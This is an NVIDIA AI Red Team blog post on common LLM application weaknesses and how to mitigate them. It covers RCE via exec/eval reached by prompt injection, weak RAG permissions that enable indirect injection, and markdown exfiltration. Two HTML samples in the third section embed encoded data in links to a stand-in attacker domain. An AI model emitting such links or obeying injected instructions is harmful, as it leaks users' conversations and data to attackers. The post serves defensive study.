Practical LLM Security Advice from the NVIDIA AI Red Team

A cybersecurity image.
Oct 02, 2025
By , , , , , and
Over the last several years, the NVIDIA AI Red Team (AIRT) has evaluated numerous and diverse AI-enabled systems for potential vulnerabilities and security weaknesses before they reach production. AIRT has identified several common vulnerabilities and potential security weaknesses that, if addressed during development, can significantly improve the security of LLM-based applications.  

Common findings

In this blog, we share key findings from those assessments and how to mitigate the most significant risks.

Vulnerability 1: Executing LLM-generated code can lead to remote code execution

One of the most serious and recurring issues is using functions like exec or eval on LLM-generated output with insufficient isolation. While developers may use these functions to generate plots, they’re sometimes extended to more complex tasks, such as performing mathematical calculations, building SQL queries, or generating code for data analysis.

The risk? Attackers can use prompt injection, direct or indirect, to manipulate the LLM into producing malicious code. If that output is executed without proper sandboxing, it can lead to remote code execution (RCE), potentially giving attackers access to the full application environment.

A screenshot of highlighted text showing a prompt injection with color-coded layers of encapsulation and evasion to deliver the payload through layers of pre-processing.
Figure 1. A prompt injection used to gain remote code execution against a system that passes LLM-generated code into an exec statement to perform data analysis

The fix here is clear: avoid using exec, eval, or similar constructs—especially in LLM-generated code. These functions are inherently risky, and when combined with prompt injection, they can make RCE almost trivial. Even when exec or eval are nested far into the library and potentially protected by guardrails, an attacker can encapsulate their malicious command in layers of evasion and obfuscation.

In Figure 1, a prompt injection gains RCE through encapsulation in guardrail evasions (shown in green), prompt engineering around the system prompts introduced by calls in the library (blue and orange) before the final payload (pink).

Instead, structure your application to parse the LLM response for intent or instructions and then map those to a predefined set of safe, explicitly permitted functions. If dynamic code execution is necessary, make sure it is executed in a secure, isolated sandbox environment. Our post on WebAssembly-based browser sandboxes outlines one way to approach this safely.

Vulnerability 2: Insecure access control in retrieval-augmented generation data sources

Retrieval-augmented generation (RAG) is a widely adopted LLM application architecture that enables applications to incorporate up-to-date external data without retraining the model. The information retrieval step can also be a vector for attackers to inject data. In practice, we see two major weaknesses associated with RAG use:

First, permission to read sensitive information may not be correctly implemented on a per-user basis. When this happens, users may be able to access information in documents that they shouldn’t be able to see. We commonly see this happen in the following ways. 

  1. The permissions in the original source of the data (e.g., Confluence, Google Workspace) haven’t been correctly set and maintained. This error is then propagated to the RAG data store when the documents are ingested into the RAG database.
  2. The RAG data store doesn’t faithfully reproduce source-specific permissions, often by use of an overpermissioned “read” token to the original source of the documents. 
  3. Delays in propagating permissions from the source to the RAG database cause staleness issues and leave data exposed.

Reviewing how delegated authorization is managed to the document or data sources can help catch this issue early, and teams can design around it.

The other serious vulnerability we commonly see is broad access to write to the RAG data store. For instance, if a user’s emails are part of the data in the retrieval phase of a RAG pipeline, anyone with that knowledge could have the content included in the data the RAG retriever returns. This opens the door to indirect prompt injection, which in some cases can be very precisely and narrowly targeted, making detection extremely difficult. This vulnerability is often an early element of an attack chain, with later objectives ranging from simply poisoning application results on a specific topic to exfiltrating the user’s personal documents or data.

Mitigating broad write access to the RAG data store can be quite difficult, since it often impacts the desired functionality of the application. For example, being able to summarize a day’s worth of email is a potentially valuable and important use case. In this case, mitigation must occur at other places in the application or be designed around the specific application requirements.

In the case of email, enabling external emails to be excluded or accessed as a separate data source to avoid cross-contamination of results might be a useful approach.  In the case of workspace documents (e.g., SharePoint, Google Workspace), enabling a user to select between only their documents, documents only from people in their organization, and all documents may help limit the impact of maliciously shared documents.  

Content security policies (see the next vulnerability) can be used to reduce the risk of data exfiltration. Guardrail checks can be applied to augmented prompts or retrieved documents to ensure that they’re in fact on-topic for the query. Finally, authoritative documents or data sets for specific domains (e.g., HR-related information) can be established that are more tightly controlled to prevent malicious document injection.

Vulnerability 3: Active content rendering of LLM outputs

The use of Markdown (and other active content) to exfiltrate data has been a known issue since Johann Rehberger published about it in mid-2023. However, the AI Red Team still finds this vulnerability in LLM-powered applications.

By appending content to a link or image that directs the user’s browser to an attacker’s server, that content will appear in the logs of the attacker’s server if the browser renders the image or the user clicks the link, as shown in Figure 2. The renderer must make a network call to the attacker’s domain to fetch the image data. This same network call can also include encoded sensitive data, exfiltrating it to the attacker. Indirect prompt injection can often be exploited to encode information such as the user’s conversation history into a link, leading to data exfiltration.  

<div class="markdown-body">
  <p>
    <img src="https://iamanevildomain.com/q?SGVsbG8hIFdlIGxpa2UgdhIGN1dCBvZiB5b3VyIGppYiEgRW1haWwgbWUgd2loCB0aGUgcGFzc3dvc mQgQVBQTEUgU0FVQ0Uh" alt="This is Fine">
  </p>
  <h3>Sources</h3>
</div>
A chat session where the server's response contains the requested image (the “this is fine” meme).
Figure 2. Testing for image markdown rendering exfiltration, with the malicious payload automatically exfiltrating data by loading the image shown

Similarly, in Figure 3, hyperlinks can be used to obfuscate the destination and any appended query data. That link could exfiltrate Tm93IHlvdSdyZSBqdXN0IHNob3dpbmcgb2ZmIDsp by encoding it in the query string as shown.

<a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineAlways css-7mvu2w" href="https://iamanevildomain.com/q?Tm93IHlvdSdyZSBqdXN0IHNob3dpbmcgb2ZmIDsp" node="[object Object]" target="_blank">click here to learn more!</a>
A chat session where the server’s response contains the requested phrase complete with active link.
Figure 3. A chat session with the server returning a hyperlink

To mitigate this vulnerability, we recommend one or more of the following:

  1. Use image content security policies that only allow images to be loaded from a predetermined list of “safe” sites. This prevents the user’s browser from rendering images automatically from an attacker’s servers. 
  2. For active hyperlinks, the application should display the entire link to the user before connecting to an external site, or links should be “inactive,” requiring a copy-paste operation to access the domain.
  3. Sanitize all LLM output to attempt to remove markdown, HTML, URLs, or other potential active content that is generated dynamically by the LLM.
  4. As a last resort, disable active content entirely within the user interface.

Conclusion

The NVIDIA AI Red Team has assessed dozens of AI-powered applications and identified several straightforward recommendations for hardening and securing them.  Our top three most significant findings are execution of LLM-generated code leading to remote code execution, insecure permissions on RAG data stores enabling data leakage and/or indirect prompt injection, and active content rendering of LLM outputs leading to data exfiltration. By looking for and addressing these vulnerabilities, you can secure your LLM implementation against the most common and impactful vulnerabilities.

If you’re interested in better understanding the fundamentals of adversarial machine learning, enroll in the self-paced online NVIDIA DLI training, Exploring Adversarial Machine Learning. To learn more about our ongoing work in this space, browse other NVIDIA Technical Blog posts on cybersecurity and AI security.

Cybersecurity | Data Science | Generative AI | General | Intermediate Technical | Tutorial | AI Red Team | featured | LLM Techniques | Retrieval Augmented Generation (RAG) | Security for AI

About the Authors

Avatar photo
About Rich Harang
Rich Harang is a Principal Security Architect at NVIDIA, specializing in ML/AI systems, with over a decade of experience at the intersection of computer security, machine learning, and privacy. He received his PhD in Statistics from the University of California Santa Barbara in 2010. Prior to joining NVIDIA, he led the Algorithms Research team at Duo, led research on using machine learning models to detect malicious software, scripts, and web content at Sophos AI, and worked as a Team Lead at the US Army Research Laboratory. His research interests include adversarial machine learning, addressing bias and uncertainty in machine learning, and ways to use machine learning to support human analysis. Richard’s work has been presented at USENIX, BlackHat, IEEE S&P workshops, and DEF CON AI Village, among others, and has also been featured in The Register and KrebsOnSecurity.
Joseph Lucas
About Joseph Lucas
Joe is a Principal Offensive Security Researcher focused on AI at NVIDIA. He is the founder and Chair of the NumFOCUS Security Committee and is a member of the Jupyter Security Council. He was one of the architects and hosts of the DEF CON 30 AI Village Capture the Flag competition and is passionate about machine learning security education. He served in the US Army at US Cyber Command and the 101st Airborne Division. He holds a master's degree in Computer Science from Georgia Institute of Technology and a bachelor's degree in Mathematics from the United States Military Academy.
Avatar photo
About John Irwin
John Irwin is a senior security engineer focused on AI at NVIDIA. Prior to focusing on AI, he identified vulnerabilities and mitigations in many NVIDIA products, mostly focused on cloud and high-performance compute solutions. He has also competed in and occasionally run CTFs for over a decade. Before NVIDIA, he worked in Microsoft’s AI & Research org and as a consultant helping secure many different types of products. He holds a B.Sc. in Informatics from the University of Washington’s iSchool and an AS in computer science and engineering.
Avatar photo
About Becca Lynch
Becca Lynch is an offensive security researcher on the NVIDIA AI Red Team, where she works to secure AI models and model infrastructure. Her prior work includes applied machine learning for anomaly detection at Duo Security, and leveraging data science expertise to build robust and actionable processes for threat hunting and intelligence. She earned her bachelor’s degree in Computer Science from the University of Michigan in 2018, and her master’s degree in Data Science from the University of Illinois in 2021. Becca’s work has been presented at Black Hat, DEF CON AI Village, and CAMLIS.
Avatar photo
About Leon Derczynski
Leon Derczynski is principal research scientist in LLM security at NVIDIA and professor of natural language processing (NLP) at ITU Copenhagen. He has published over 100 NLP papers. Leon contributes to leading bodies on LLM security, is on the OWASP LLM Top 10 core team, works on ML Commons, and is the founder of the ACL SIG on NLP Security. Leon heads up the LLM vulnerability scanner garak with the NVIDIA NeMo Guardrails team.
Avatar photo
About Erick Galinkin
Erick Galinkin is a research scientist at NVIDIA working on the security assessment and protection of large language models (LLMs). Previously, he led the AI research team at Rapid7 and has extensive experience working in the cybersecurity space. He is an alumnus of Johns Hopkins University and holds degrees in Applied Mathematics and Computer Science. Outside of his work, Erick is a lifelong student, currently at Drexel University, and is renowned for his ability to be around equestrians.
Avatar photo
About Daniel Teixeira
Daniel Teixeira is a senior offensive security researcher and Red Team operator at NVIDIA, bringing over a decade of experience in penetration testing, vulnerability research, and red teaming. His research interests include adversary simulation, adversarial machine learning, agentic AI systems, MLOps, and LLMOps.

